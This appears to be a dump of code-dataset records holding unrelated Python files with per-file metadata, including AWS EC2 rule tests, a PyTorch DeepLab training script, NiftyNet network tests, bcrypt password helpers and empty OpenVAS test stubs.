ec2_instance_types=[ec2_instance_type]) # Act result = self.rule.run(context, {}) # Assert self.assertEqual(RuleResultType.FAILED, result.status) self.assertEqual(1, len(result.issues)) def test_non_car_ec2_instance_is_ebs_optimized__in_list__pass(self): # Arrange ec2: Ec2Instance = create_empty_entity(Ec2Instance) ec2_instance_type = Ec2InstanceType('t2.micro', EbsInfo('default', 'supported')) account: Account = create_empty_entity(Account) account.account = '11111111' ec2.instance_type = 't2.micro' ec2.ebs_optimized = False context = AwsEnvironmentContext(ec2s=[ec2], accounts=[account], ec2_instance_types=[ec2_instance_type]) # Act result = self.rule.run(context, {}) # Assert self.assertEqual(RuleResultType.SUCCESS, result.status) self.assertEqual(0, len(result.issues)) def test_non_car_ec2_instance_is_ebs_optimized__not_in_list_optimized__pass(self): # Arrange ec2: Ec2Instance = create_empty_entity(Ec2Instance) ec2_instance_type = Ec2InstanceType('t2.micro', EbsInfo('default', 'supported')) account: Account = create_empty_entity(Account) account.account = '11111111' ec2.instance_type = 't3.micro' ec2.ebs_optimized = True context = AwsEnvironmentContext(ec2s=[ec2], accounts=[account], ec2_instance_types=[ec2_instance_type]) # Act result = self.rule.run(context, {}) # Assert self.assertEqual(RuleResultType.SUCCESS, result.status) self.assertEqual(0, len(result.issues)) def test_non_car_ec2_instance_is_ebs_optimized__no_list__pass(self): # Arrange ec2: Ec2Instance = create_empty_entity(Ec2Instance) ec2_instance_type = Ec2InstanceType('t2.micro', EbsInfo('default', 'supported')) account: Account = create_empty_entity(Account) account.account = '11111111' ec2.instance_type = 't3.micro' ec2.ebs_optimized = True context = AwsEnvironmentContext(ec2s=[ec2], ec2_instance_types=[ec2_instance_type]) # Act result = self.rule.run(context, {}) # Assert self.assertEqual(RuleResultType.SUCCESS, result.status) self.assertEqual(0, len(result.issues))
47.087912
125
0.715053
479
4,285
6.104384
0.152401
0.105335
0.082079
0.02223
0.819083
0.797196
0.797196
0.797196
0.765732
0.755814
0
0.036033
0.190432
4,285
90
126
47.611111
0.806861
0.021937
0
0.731343
0
0
0.047904
0
0
0
0
0
0.149254
1
0.089552
false
0.044776
0.119403
0
0.223881
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
7
b2fcea547a816596e5ece1e1ef169d8be84e9097
191
py
Python
Basics/ecommerce/app.py
caseysalvador/Python
19bc762a123e98ebbac427c69ce58925e507b045
[ "MIT" ]
null
null
null
Basics/ecommerce/app.py
caseysalvador/Python
19bc762a123e98ebbac427c69ce58925e507b045
[ "MIT" ]
null
null
null
Basics/ecommerce/app.py
caseysalvador/Python
19bc762a123e98ebbac427c69ce58925e507b045
[ "MIT" ]
null
null
null
#from ecommerce.shipping import calc_shipping # first example of import from ecommerce import shipping #ecommerce.shipping.calc_shipping() # first example of import shipping.calc_shipping
31.833333
72
0.827225
25
191
6.2
0.32
0.232258
0.219355
0.309677
0.412903
0.412903
0
0
0
0
0
0
0.120419
191
6
73
31.833333
0.922619
0.680628
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
0.5
0
0.5
0
1
0
0
null
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
0
0
0
7
65135f8bd9a8297fc1c021a2e3624b3e00552433
8,031
py
Python
train.py
MiseryForMe/MDC
470b2db76a71d7e4260de7e39e6cf9a61c80ca2b
[ "Apache-2.0" ]
null
null
null
train.py
MiseryForMe/MDC
470b2db76a71d7e4260de7e39e6cf9a61c80ca2b
[ "Apache-2.0" ]
null
null
null
train.py
MiseryForMe/MDC
470b2db76a71d7e4260de7e39e6cf9a61c80ca2b
[ "Apache-2.0" ]
null
null
null
#!/usr/bin/python # -*- encoding: utf-8 -*- import torch import torch.nn as nn from torch.utils.data import DataLoader import torch.nn.functional as F import os import os.path as osp import time import sys import logging import numpy as np import argparse import importlib import json import cv2 from lib.model import DeepLabLargeFOV from lib.pascal_voc import PascalVoc from lib.pascal_voc_aug import PascalVoc_Aug from lib.transform import RandomCrop from lib.optimizer import Optimizer from lib.loss import * from utils.logger import setup_logger from evaluate import eval_model from torchsummary import summary batchsize = 16 torch.multiprocessing.set_sharing_strategy('file_system') def get_args(): parser = argparse.ArgumentParser(description='Train a network') parser.add_argument( '--cfg', dest = 'cfg', type = str, default = 'config/pascal_voc_aug_multi_scale.py', help = 'config file for training' ) return parser.parse_args() def train(args): ## setup cfg and logger spec = importlib.util.spec_from_file_location('mod_cfg', args.cfg) mod_cfg = importlib.util.module_from_spec(spec) spec.loader.exec_module(mod_cfg) cfg = mod_cfg.cfg cfg_str = json.dumps(cfg, ensure_ascii=False, indent=2) if not osp.exists(cfg.res_pth): os.makedirs(cfg.res_pth) setup_logger(cfg.res_pth) logger = logging.getLogger(__name__) logger.info(cfg_str) device = torch.device('cuda:0') ## modules and losses logger.info('creating model and loss module') net = DeepLabLargeFOV(3, cfg.n_classes) #for item in net.parameters(): # print(item.size()) net.train() net.cuda() if not torch.cuda.device_count() == 0: net = nn.DataParallel(net) n_min = (cfg.crop_size**2) * cfg.batchsize // 16 criteria = OhemCELoss(0.7, n_min) globloss = GlobLoss(0.7,n_min) criteria.cuda() #summary(net,(3,321,321)) ## dataset logger.info('creating dataset and dataloader') ds = eval(cfg.dataset)(cfg, mode='train') dl = DataLoader(ds, batch_size = cfg.batchsize, shuffle = True, num_workers = cfg.n_workers, drop_last = True) ## optimizer logger.info('creating optimizer') optimizer = Optimizer( params = net.parameters(), warmup_start_lr = cfg.warmup_start_lr, warmup_steps = cfg.warmup_iter, lr0 = cfg.start_lr, max_iter = cfg.iter_num, momentum = cfg.momentum, wd = cfg.weight_decay, power = cfg.power) ## train loop loss_avg = [] st = time.time() diter = iter(dl) logger.info('start training') max = 0 min = 0 mean = 0 for it in range(cfg.iter_num): print('training') try: im, lb ,clb = next(diter) if not im.size()[0] == cfg.batchsize: continue except StopIteration: diter = iter(dl) im, lb = next(diter) im = im.cuda() lb = lb.cuda()#16,1,321,321 optimizer.zero_grad() out,pred_c1,pred_c2,pred_c3,pred_c4,CAMs_1,CAMs_2,CAMs_3,CAMs_4,location_map,pred_mask = net(im)#out:16.21.321.321 pred:(16,21) print(out.size()) lb = torch.squeeze(lb) #false_mask = torch.from_numpy(false_mask) loss = globloss(out,location_map,pred_mask,clb,pred_c1,pred_c2,pred_c3,pred_c4) loss.backward() optimizer.step() loss = loss.detach().cpu().numpy() loss_avg.append(loss) ## log message if it%cfg.log_iter==0 and not it==0: loss_avg = sum(loss_avg) / len(loss_avg) ed = time.time() t_int = ed - st lr = optimizer.get_lr() msg = 'iter: {}/{}, loss: {:.4f}'.format(it, cfg.iter_num, loss_avg) msg = '{}, lr: {:4f}, time: {:.4f}'.format(msg, lr, t_int) logger.info(msg) st = ed loss_avg = [] ## dump model model_pth = osp.join(cfg.res_pth, 'model_final.pkl') net.cpu() state_dict = net.module.state_dict() if hasattr(net, 'module') else net.state_dict() torch.save(state_dict, model_pth) logger.info('training done, model saved to: {}'.format(model_pth)) ## test after train if cfg.test_after_train: net.cuda() mIOU = eval_model(net, cfg) logger.info('iou in whole is: {}'.format(mIOU)) def test(args): ## setup cfg and logger spec = importlib.util.spec_from_file_location('mod_cfg', args.cfg) mod_cfg = importlib.util.module_from_spec(spec) spec.loader.exec_module(mod_cfg) cfg = mod_cfg.cfg cfg_str = json.dumps(cfg, ensure_ascii=False, indent=2) if not osp.exists(cfg.res_pth): os.makedirs(cfg.res_pth) setup_logger(cfg.res_pth) logger = logging.getLogger(__name__) logger.info(cfg_str) device = torch.device('cuda:0') ## modules and losses logger.info('creating model and loss module') net = DeepLabLargeFOV(3, cfg.n_classes) #for item in net.parameters(): # print(item.size()) net.eval() net.cuda() if not torch.cuda.device_count() == 0: net = nn.DataParallel(net) n_min = (cfg.crop_size**2) * cfg.batchsize // 16 criteria = OhemCELoss(0.7, n_min) globloss = GlobLoss(0.7,n_min) criteria.cuda() #summary(net,(3,321,321)) ## dataset logger.info('creating dataset and dataloader') ds = eval(cfg.dataset)(cfg, mode='train') dl = DataLoader(ds, batch_size = cfg.batchsize, shuffle = True, num_workers = cfg.n_workers, drop_last = True) ## optimizer logger.info('creating optimizer') optimizer = Optimizer( params = net.parameters(), warmup_start_lr = cfg.warmup_start_lr, warmup_steps = cfg.warmup_iter, lr0 = cfg.start_lr, max_iter = cfg.iter_num, momentum = cfg.momentum, wd = cfg.weight_decay, power = cfg.power) ## train loop loss_avg = [] st = time.time() diter = iter(dl) logger.info('start training') max = 0 min = 0 mean = 0 for it in range(cfg.iter_num): print('training') try: im, lb ,clb = next(diter) if not im.size()[0] == cfg.batchsize: continue except StopIteration: diter = iter(dl) im, lb = next(diter) im = im.cuda() lb = lb.cuda()#16,1,321,321 optimizer.zero_grad() out,pred_c1,pred_c2,pred_c3,pred_c4,CAMs_1,CAMs_2,CAMs_3,CAMs_4,location_map,pred_mask = net(im)#out:16.21.321.321 pred:(16,21) print(out.size()) lb = torch.squeeze(lb) #false_mask = torch.from_numpy(false_mask) loss = globloss(out,location_map,pred_mask,clb,pred_c1,pred_c2,pred_c3,pred_c4) loss.backward() optimizer.step() loss = loss.detach().cpu().numpy() loss_avg.append(loss) ## log message if it%cfg.log_iter==0 and not it==0: loss_avg = sum(loss_avg) / len(loss_avg) ed = time.time() t_int = ed - st lr = optimizer.get_lr() msg = 'iter: {}/{}, loss: {:.4f}'.format(it, cfg.iter_num, loss_avg) msg = '{}, lr: {:4f}, time: {:.4f}'.format(msg, lr, t_int) logger.info(msg) st = ed loss_avg = [] ## dump model model_pth = osp.join(cfg.res_pth, 'model_final.pkl') net.cpu() state_dict = net.module.state_dict() if hasattr(net, 'module') else net.state_dict() torch.save(state_dict, model_pth) logger.info('training done, model saved to: {}'.format(model_pth)) ## test after train if cfg.test_after_train: net.cuda() mIOU = eval_model(net, cfg) logger.info('iou in whole is: {}'.format(mIOU)) if __name__ == "__main__": args = get_args() train(args)
30.888462
135
0.604159
1,110
8,031
4.193694
0.191892
0.034372
0.015467
0.005156
0.829646
0.829646
0.829646
0.829646
0.829646
0.829646
0
0.022173
0.269954
8,031
259
136
31.007722
0.771789
0.071473
0
0.792079
0
0
0.079611
0.004858
0
0
0
0
0
1
0.014851
false
0
0.133663
0
0.153465
0.019802
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
7
6523a710689873c0a317852bfe72e49485ff06f0
2,522
py
Python
tests/interventional_hybrid_net_test.py
elias-1/NiftyNet
05cd2ffbff5043d9a40b524a6d72f6bd5cd072d2
[ "Apache-2.0" ]
6
2018-10-18T15:36:52.000Z
2021-03-03T18:39:41.000Z
tests/interventional_hybrid_net_test.py
elias-1/NiftyNet
05cd2ffbff5043d9a40b524a6d72f6bd5cd072d2
[ "Apache-2.0" ]
9
2020-11-13T19:08:08.000Z
2022-02-10T02:25:56.000Z
tests/interventional_hybrid_net_test.py
elias-1/NiftyNet
05cd2ffbff5043d9a40b524a6d72f6bd5cd072d2
[ "Apache-2.0" ]
2
2018-05-13T14:54:48.000Z
2018-05-26T16:08:09.000Z
from __future__ import absolute_import, print_function import tensorflow as tf from niftynet.network.toynet import ToyNet from niftynet.network.interventional_hybrid_net import INetHybridPreWarp, INetHybridTwoStream class INetHybridPreWarpTest(tf.test.TestCase): def test_3d_shape(self): input_shape = (2, 32, 32, 32, 1) x = tf.ones(input_shape) hybridnet_instance = INetHybridPreWarp(1e-6) out = hybridnet_instance(x, x, is_training=True) print(hybridnet_instance) with self.test_session() as sess: sess.run(tf.global_variables_initializer()) out = sess.run(out) self.assertAllClose((2, 32, 32, 32, 3), out[0].shape) self.assertAllClose((2, 32, 32, 32, 3), out[1].shape) def test_2d_shape(self): input_shape = (2, 32, 32, 1) x = tf.ones(input_shape) hybridnet_instance = INetHybridPreWarp(1e-6) out = hybridnet_instance(x, x, is_training=True) print(hybridnet_instance) with self.test_session() as sess: sess.run(tf.global_variables_initializer()) out = sess.run(out) self.assertAllClose((2, 32, 32, 2), out[0].shape) self.assertAllClose((2, 32, 32, 2), out[1].shape) class INetHybridTwoStreamTest(tf.test.TestCase): def test_3d_shape(self): input_shape = (2, 32, 32, 32, 1) x = tf.ones(input_shape) hybridnet_instance = INetHybridTwoStream(1e-6) out = hybridnet_instance(x, x, is_training=True) print(hybridnet_instance) with self.test_session() as sess: sess.run(tf.global_variables_initializer()) out = sess.run(out) self.assertAllClose((2, 32, 32, 32, 3), out[0].shape) self.assertAllClose((2, 32, 32, 32, 3), out[1].shape) self.assertAllClose((2, 32, 32, 32, 3), out[2].shape) def test_2d_shape(self): input_shape = (2, 32, 32, 1) x = tf.ones(input_shape) hybridnet_instance = INetHybridTwoStream(1e-6) out = hybridnet_instance(x, x, is_training=True) print(hybridnet_instance) with self.test_session() as sess: sess.run(tf.global_variables_initializer()) out = sess.run(out) self.assertAllClose((2, 32, 32, 2), out[0].shape) self.assertAllClose((2, 32, 32, 2), out[1].shape) self.assertAllClose((2, 32, 32, 2), out[2].shape) if __name__ == "__main__": tf.test.main()
33.626667
93
0.622522
331
2,522
4.561934
0.163142
0.055629
0.046358
0.139073
0.824503
0.824503
0.824503
0.824503
0.806623
0.787417
0
0.063898
0.255353
2,522
74
94
34.081081
0.740149
0
0
0.814815
0
0
0.003172
0
0
0
0
0
0.185185
1
0.074074
false
0
0.074074
0
0.185185
0.092593
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
7
e8eba1e05b9b97d717cf89d471e77d5157a7c75d
102
py
Python
devtools/svg/tags.py
gianmaria/nothing
a423ce126e2437d89c6b30a9929004da87ea6280
[ "MIT" ]
null
null
null
devtools/svg/tags.py
gianmaria/nothing
a423ce126e2437d89c6b30a9929004da87ea6280
[ "MIT" ]
null
null
null
devtools/svg/tags.py
gianmaria/nothing
a423ce126e2437d89c6b30a9929004da87ea6280
[ "MIT" ]
null
null
null
RECT_TAG_NAME = '{http://www.w3.org/2000/svg}rect' TEXT_TAG_NAME = '{http://www.w3.org/2000/svg}text'
34
50
0.705882
20
102
3.4
0.5
0.205882
0.323529
0.411765
0.764706
0.764706
0.764706
0.764706
0
0
0
0.104167
0.058824
102
2
51
51
0.604167
0
0
0
0
0
0.627451
0
0
0
0
0
0
1
0
false
0
0
0
0
0
1
0
0
null
1
1
1
0
1
1
1
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
1
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
9
3324f7fe561236b85e20064d171292578e8e31cb
291
py
Python
models/passwords.py
xiomara-masmela/feedback_web_app
d6c035159b4b3c7ea33ce8973fb18792853e1df1
[ "MIT" ]
null
null
null
models/passwords.py
xiomara-masmela/feedback_web_app
d6c035159b4b3c7ea33ce8973fb18792853e1df1
[ "MIT" ]
null
null
null
models/passwords.py
xiomara-masmela/feedback_web_app
d6c035159b4b3c7ea33ce8973fb18792853e1df1
[ "MIT" ]
null
null
null
import bcrypt def convert_secure_password(password): password_hash = bcrypt.hashpw(password.encode(), bcrypt.gensalt()).decode() return password_hash def check_password(password, password_hash): valid = bcrypt.checkpw(password.encode(), password_hash.encode()) return valid
32.333333
79
0.766323
35
291
6.171429
0.428571
0.296296
0.222222
0.259259
0
0
0
0
0
0
0
0
0.123711
291
9
80
32.333333
0.847059
0
0
0
0
0
0
0
0
0
0
0
0
1
0.285714
false
0.714286
0.142857
0
0.714286
0
0
0
0
null
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
1
0
0
1
0
0
7
686958155b3cade7c1e41952cc7ac7755582b929
144
py
Python
src/color_detection/__init__.py
songdet/rubik_cube_solver
186efde7a6b3b3e7520abc91c9c46c4d78606e88
[ "MIT" ]
null
null
null
src/color_detection/__init__.py
songdet/rubik_cube_solver
186efde7a6b3b3e7520abc91c9c46c4d78606e88
[ "MIT" ]
null
null
null
src/color_detection/__init__.py
songdet/rubik_cube_solver
186efde7a6b3b3e7520abc91c9c46c4d78606e88
[ "MIT" ]
null
null
null
from color_detection.detect import detect from color_detection.detect import ColorDetector from color_detection.calibrate import get_color_bound
48
53
0.902778
20
144
6.25
0.45
0.216
0.432
0.384
0.48
0
0
0
0
0
0
0
0.076389
144
3
53
48
0.93985
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
0
0
null
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
8
d7f6fd72cf75693b0e429580feefa645d9e58921
16,043
py
Python
tests/test_openvas_lib_data.py
abhishekvasishtb/openvas_lib
8525e05860e012e30ff633652cb5d20050baa032
[ "BSD-3-Clause" ]
77
2015-04-22T10:43:15.000Z
2021-02-21T04:14:46.000Z
tests/test_openvas_lib_data.py
zeinlol/openvas_lib
326bde506ccb2b98fe52f30bfc623e30f4525194
[ "BSD-3-Clause" ]
39
2015-03-18T04:33:15.000Z
2022-03-17T06:52:00.000Z
tests/test_openvas_lib_data.py
zeinlol/openvas_lib
326bde506ccb2b98fe52f30bfc623e30f4525194
[ "BSD-3-Clause" ]
100
2015-01-18T16:42:55.000Z
2021-12-01T23:57:14.000Z
import unittest class TestOpenVASPort(unittest.TestCase): pass # def test___init__(self): # # open_vas_port = OpenVASPort(port_name, number, proto) # assert False # TODO: implement your test here # # def test_number(self): # # open_vas_port = OpenVASPort(port_name, number, proto) # # self.assertEqual(expected, open_vas_port.number()) # assert False # TODO: implement your test here # # def test_port_name(self): # # open_vas_port = OpenVASPort(port_name, number, proto) # # self.assertEqual(expected, open_vas_port.port_name()) # assert False # TODO: implement your test here # # def test_proto(self): # # open_vas_port = OpenVASPort(port_name, number, proto) # # self.assertEqual(expected, open_vas_port.proto()) # assert False # TODO: implement your test here class TestOpenVASNVT(unittest.TestCase): pass # def test___init__(self): # # open_vasnv_t = OpenVASNVT() # assert False # TODO: implement your test here # # def test_bid(self): # # open_vasnv_t = OpenVASNVT() # # self.assertEqual(expected, open_vasnv_t.bid()) # assert False # TODO: implement your test here # # def test_bid_case_2(self): # # open_vasnv_t = OpenVASNVT() # # self.assertEqual(expected, open_vasnv_t.bid(val)) # assert False # TODO: implement your test here # # def test_bugtraq(self): # # open_vasnv_t = OpenVASNVT() # # self.assertEqual(expected, open_vasnv_t.bugtraq()) # assert False # TODO: implement your test here # # def test_bugtraq_case_2(self): # # open_vasnv_t = OpenVASNVT() # # self.assertEqual(expected, open_vasnv_t.bugtraq(val)) # assert False # TODO: implement your test here # # def test_category(self): # # open_vasnv_t = OpenVASNVT() # # self.assertEqual(expected, open_vasnv_t.category()) # assert False # TODO: implement your test here # # def test_category_case_2(self): # # open_vasnv_t = OpenVASNVT() # # self.assertEqual(expected, open_vasnv_t.category(val)) # assert False # TODO: implement your test here # # def test_cve(self): # # open_vasnv_t = OpenVASNVT() # # self.assertEqual(expected, open_vasnv_t.cve()) # assert False # TODO: implement your test here # # def test_cve_case_2(self): # # open_vasnv_t = OpenVASNVT() # # self.assertEqual(expected, open_vasnv_t.cve(val)) # assert False # TODO: implement your test here # # def test_cvss_base(self): # # open_vasnv_t = OpenVASNVT() # # self.assertEqual(expected, open_vasnv_t.cvss_base()) # assert False # TODO: implement your test here # # def test_cvss_base_case_2(self): # # open_vasnv_t = OpenVASNVT() # # self.assertEqual(expected, open_vasnv_t.cvss_base(val)) # assert False # TODO: implement your test here # # def test_description(self): # # open_vasnv_t = OpenVASNVT() # # self.assertEqual(expected, open_vasnv_t.raw_description()) # assert False # TODO: implement your test here # # def test_description_case_2(self): # # open_vasnv_t = OpenVASNVT() # # self.assertEqual(expected, open_vasnv_t.raw_description(val)) # assert False # TODO: implement your test here # # def test_family(self): # # open_vasnv_t = OpenVASNVT() # # self.assertEqual(expected, open_vasnv_t.family()) # assert False # TODO: implement your test here # # def test_family_case_2(self): # # open_vasnv_t = OpenVASNVT() # # self.assertEqual(expected, open_vasnv_t.family(val)) # assert False # TODO: implement your test here # # def test_fingerprints(self): # # open_vasnv_t = OpenVASNVT() # # self.assertEqual(expected, open_vasnv_t.fingerprints()) # assert False # TODO: implement your test here # # def test_fingerprints_case_2(self): # # open_vasnv_t = OpenVASNVT() # # self.assertEqual(expected, open_vasnv_t.fingerprints(val)) # assert False # TODO: implement your test here # # def test_make_object(self): # # open_vasnv_t = OpenVASNVT() # # self.assertEqual(expected, open_vasnv_t.make_object(oid, name, cvss_base, risk_factor, summary, raw_description, family, category, cve, bid, bugtraq, xrefs, fingerprints, tags)) # assert False # TODO: implement your test here # # def test_name(self): # # open_vasnv_t = OpenVASNVT() # # self.assertEqual(expected, open_vasnv_t.name()) # assert False # TODO: implement your test here # # def test_name_case_2(self): # # open_vasnv_t = OpenVASNVT() # # self.assertEqual(expected, open_vasnv_t.name(val)) # assert False # TODO: implement your test here # # def test_oid(self): # # open_vasnv_t = OpenVASNVT() # # self.assertEqual(expected, open_vasnv_t.oid()) # assert False # TODO: implement your test here # # def test_oid_case_2(self): # # open_vasnv_t = OpenVASNVT() # # self.assertEqual(expected, open_vasnv_t.oid(val)) # assert False # TODO: implement your test here # # def test_risk_factor(self): # # open_vasnv_t = OpenVASNVT() # # self.assertEqual(expected, open_vasnv_t.risk_factor()) # assert False # TODO: implement your test here # # def test_risk_factor_case_2(self): # # open_vasnv_t = OpenVASNVT() # # self.assertEqual(expected, open_vasnv_t.risk_factor(val)) # assert False # TODO: implement your test here # # def test_summary(self): # # open_vasnv_t = OpenVASNVT() # # self.assertEqual(expected, open_vasnv_t.summary()) # assert False # TODO: implement your test here # # def test_summary_case_2(self): # # open_vasnv_t = OpenVASNVT() # # self.assertEqual(expected, open_vasnv_t.summary(val)) # assert False # TODO: implement your test here # # def test_tags(self): # # open_vasnv_t = OpenVASNVT() # # self.assertEqual(expected, open_vasnv_t.tags()) # assert False # TODO: implement your test here # # def test_tags_case_2(self): # # open_vasnv_t = OpenVASNVT() # # self.assertEqual(expected, open_vasnv_t.tags(val)) # assert False # TODO: implement your test here # # def test_xrefs(self): # # open_vasnv_t = OpenVASNVT() # # self.assertEqual(expected, open_vasnv_t.xrefs()) # assert False # TODO: implement your test here # # def test_xrefs_case_2(self): # # open_vasnv_t = OpenVASNVT() # # self.assertEqual(expected, open_vasnv_t.xrefs(val)) # assert False # TODO: implement your test here class TestOpenVASOverride(unittest.TestCase): pass # def test___init__(self): # # open_vas_override = OpenVASOverride() # assert False # TODO: implement your test here # # def test_make_object(self): # # open_vas_override = OpenVASOverride() # # self.assertEqual(expected, open_vas_override.make_object(oid, name, text, text_is_excerpt, threat, new_threat, orphan)) # assert False # TODO: implement your test here # # def test_name(self): # # open_vas_override = OpenVASOverride() # # self.assertEqual(expected, open_vas_override.name()) # assert False # TODO: implement your test here # # def test_name_case_2(self): # # open_vas_override = OpenVASOverride() # # self.assertEqual(expected, open_vas_override.name(val)) # assert False # TODO: implement your test here # # def test_new_threat(self): # # open_vas_override = OpenVASOverride() # # self.assertEqual(expected, open_vas_override.new_threat()) # assert False # TODO: implement your test here # # def test_new_threat_case_2(self): # # open_vas_override = OpenVASOverride() # # self.assertEqual(expected, open_vas_override.new_threat(val)) # assert False # TODO: implement your test here # # def test_oid(self): # # open_vas_override = OpenVASOverride() # # self.assertEqual(expected, open_vas_override.oid()) # assert False # TODO: implement your test here # # def test_oid_case_2(self): # # open_vas_override = OpenVASOverride() # # self.assertEqual(expected, open_vas_override.oid(val)) # assert False # TODO: implement your test here # # def test_orphan(self): # # open_vas_override = OpenVASOverride() # # self.assertEqual(expected, open_vas_override.orphan()) # assert False # TODO: implement your test here # # def test_orphan_case_2(self): # # open_vas_override = OpenVASOverride() # # self.assertEqual(expected, open_vas_override.orphan(val)) # assert False # TODO: implement your test here # # def test_text(self): # # open_vas_override = OpenVASOverride() # # self.assertEqual(expected, open_vas_override.text()) # assert False # TODO: implement your test here # # def test_text_case_2(self): # # open_vas_override = OpenVASOverride() # # self.assertEqual(expected, open_vas_override.text(val)) # assert False # TODO: implement your test here # # def test_text_is_excerpt(self): # # open_vas_override = OpenVASOverride() # # self.assertEqual(expected, open_vas_override.text_is_excerpt()) # assert False # TODO: implement your test here # # def test_text_is_excerpt_case_2(self): # # open_vas_override = OpenVASOverride() # # self.assertEqual(expected, open_vas_override.text_is_excerpt(val)) # assert False # TODO: implement your test here # # def test_threat(self): # # open_vas_override = OpenVASOverride() # # self.assertEqual(expected, open_vas_override.threat()) # assert False # TODO: implement your test here # # def test_threat_case_2(self): # # open_vas_override = OpenVASOverride() # # self.assertEqual(expected, open_vas_override.threat(val)) # assert False # TODO: implement your test here class TestOpenVASNotes(unittest.TestCase): pass # def test___init__(self): # # open_vas_notes = OpenVASNotes(oid, name, text, text_is_excerpt, orphan) # assert False # TODO: implement your test here # # def test_name(self): # # open_vas_notes = OpenVASNotes(oid, name, text, text_is_excerpt, orphan) # # self.assertEqual(expected, open_vas_notes.name()) # assert False # TODO: implement your test here # # def test_oid(self): # # open_vas_notes = OpenVASNotes(oid, name, text, text_is_excerpt, orphan) # # self.assertEqual(expected, open_vas_notes.oid()) # assert False # TODO: implement your test here # # def test_orphan(self): # # open_vas_notes = OpenVASNotes(oid, name, text, text_is_excerpt, orphan) # # self.assertEqual(expected, open_vas_notes.orphan()) # assert False # TODO: implement your test here # # def test_text(self): # # open_vas_notes = OpenVASNotes(oid, name, text, text_is_excerpt, orphan) # # self.assertEqual(expected, open_vas_notes.text()) # assert False # TODO: implement your test here # # def test_text_is_excerpt(self): # # open_vas_notes = OpenVASNotes(oid, name, text, text_is_excerpt, orphan) # # self.assertEqual(expected, open_vas_notes.text_is_excerpt()) # assert False # TODO: implement your test here class TestOpenVASResult(unittest.TestCase): pass # def test___init__(self): # # open_vas_result = OpenVASResult() # assert False # TODO: implement your test here # # def test_description(self): # # open_vas_result = OpenVASResult() # # self.assertEqual(expected, open_vas_result.raw_description()) # assert False # TODO: implement your test here # # def test_description_case_2(self): # # open_vas_result = OpenVASResult() # # self.assertEqual(expected, open_vas_result.raw_description(val)) # assert False # TODO: implement your test here # # def test_host(self): # # open_vas_result = OpenVASResult() # # self.assertEqual(expected, open_vas_result.host()) # assert False # TODO: implement your test here # # def test_host_case_2(self): # # open_vas_result = OpenVASResult() # # self.assertEqual(expected, open_vas_result.host(val)) # assert False # TODO: implement your test here # # def test_id(self): # # open_vas_result = OpenVASResult() # # self.assertEqual(expected, open_vas_result.id()) # assert False # TODO: implement your test here # # def test_id_case_2(self): # # open_vas_result = OpenVASResult() # # self.assertEqual(expected, open_vas_result.id(val)) # assert False # TODO: implement your test here # # def test_make_object(self): # # open_vas_result = OpenVASResult() # # self.assertEqual(expected, open_vas_result.make_object(result_id, subnet, host, port, nvt, threat, raw_description, notes, overrides)) # assert False # TODO: implement your test here # # def test_notes(self): # # open_vas_result = OpenVASResult() # # self.assertEqual(expected, open_vas_result.notes()) # assert False # TODO: implement your test here # # def test_notes_case_2(self): # # open_vas_result = OpenVASResult() # # self.assertEqual(expected, open_vas_result.notes(val)) # assert False # TODO: implement your test here # # def test_nvt(self): # # open_vas_result = OpenVASResult() # # self.assertEqual(expected, open_vas_result.nvt()) # assert False # TODO: implement your test here # # def test_nvt_case_2(self): # # open_vas_result = OpenVASResult() # # self.assertEqual(expected, open_vas_result.nvt(val)) # assert False # TODO: implement your test here # # def test_overrides(self): # # open_vas_result = OpenVASResult() # # self.assertEqual(expected, open_vas_result.overrides()) # assert False # TODO: implement your test here # # def test_overrides_case_2(self): # # open_vas_result = OpenVASResult() # # self.assertEqual(expected, open_vas_result.overrides(val)) # assert False # TODO: implement your test here # # def test_port(self): # # open_vas_result = OpenVASResult() # # self.assertEqual(expected, open_vas_result.port()) # assert False # TODO: implement your test here # # def test_port_case_2(self): # # open_vas_result = OpenVASResult() # # self.assertEqual(expected, open_vas_result.port(val)) # assert False # TODO: implement your test here # # def test_subnet(self): # # open_vas_result = OpenVASResult() # # self.assertEqual(expected, open_vas_result.subnet()) # assert False # TODO: implement your test here # # def test_subnet_case_2(self): # # open_vas_result = OpenVASResult() # # self.assertEqual(expected, open_vas_result.subnet(val)) # assert False # TODO: implement your test here # # def test_threat(self): # # open_vas_result = OpenVASResult() # # self.assertEqual(expected, open_vas_result.threat()) # assert False # TODO: implement your test here # # def test_threat_case_2(self): # # open_vas_result = OpenVASResult() # # self.assertEqual(expected, open_vas_result.threat(val)) # assert False # TODO: implement your test here if __name__ == '__main__': unittest.main()
40.718274
189
0.640778
1,891
16,043
5.162348
0.038075
0.063102
0.116779
0.186847
0.965991
0.960049
0.957591
0.957591
0.948371
0.911391
0
0.002502
0.252696
16,043
393
190
40.821883
0.811744
0.853269
0
0.384615
0
0
0.004545
0
0
0
0
0.002545
0
1
0
true
0.384615
0.076923
0
0.461538
0
0
0
0
null
0
0
1
1
1
1
1
1
1
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
null
0
0
0
0
0
0
1
1
0
0
0
0
0
10
0bd66e130e72aa780640266f5e92b40a7ebc9895
121
py
Python
platform/core/polyaxon/administration/register/artifacts_stores.py
hackerwins/polyaxon
ff56a098283ca872abfbaae6ba8abba479ffa394
[ "Apache-2.0" ]
null
null
null
platform/core/polyaxon/administration/register/artifacts_stores.py
hackerwins/polyaxon
ff56a098283ca872abfbaae6ba8abba479ffa394
[ "Apache-2.0" ]
null
null
null
platform/core/polyaxon/administration/register/artifacts_stores.py
hackerwins/polyaxon
